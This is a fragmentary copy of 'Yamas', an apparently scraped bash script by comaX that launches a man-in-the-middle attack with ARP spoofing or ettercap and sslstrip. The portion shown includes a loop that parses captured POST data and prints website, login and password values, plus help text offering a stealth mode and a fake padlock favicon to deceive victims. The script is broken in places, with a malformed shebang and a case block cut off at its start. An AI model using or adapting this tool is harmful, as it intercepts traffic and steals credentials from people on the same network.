Professional Documents
Culture Documents
Yamas
Yamas
/bin/bash
# Bash script to launch man it the middle attack and sslstrip.
# version 0.9 by comaX
version="20130313"
if [ $UID -ne 0 ]; then
echo -e "\033[31This program must be run as root.
This will probably fail.\033[m"
sleep 3
fi
log_output_dir=~
sslstrip_dir=/pentest/web/sslstrip
ask_for_install=y
if [ ! -d "$log_output_dir" ]; then
mkdir -p $log_output_dir
fi
-pl) while :
do
clear
echo -e "Parsing $2 for credentials.\n\n"
cat $2 |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i;
print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else if ($1 ~/available/) print "";
else if ($1 ~/last/) print "";
else print "Login = \t"$2}' |
uniq
sleep 3
done ;;
-h | --help) clear
echo -e "You are running $0, version $version.
usage : $0 -h -c -p -e -s -f
-h or --help : Display this help message, disclaimer and exit.
-c or --change: Display changelog and todo.
-e : Use ettercap instead of ARPspoof. One might have one's reasons...
ARPspoof is default.
-p or --parse : Only parse the given <file>. Don't use wildcards.
Use > /output_file to print to a file.
-s : Stealth mode. The script won't download anything.
-f : Use a padlock favicon in sslstrip.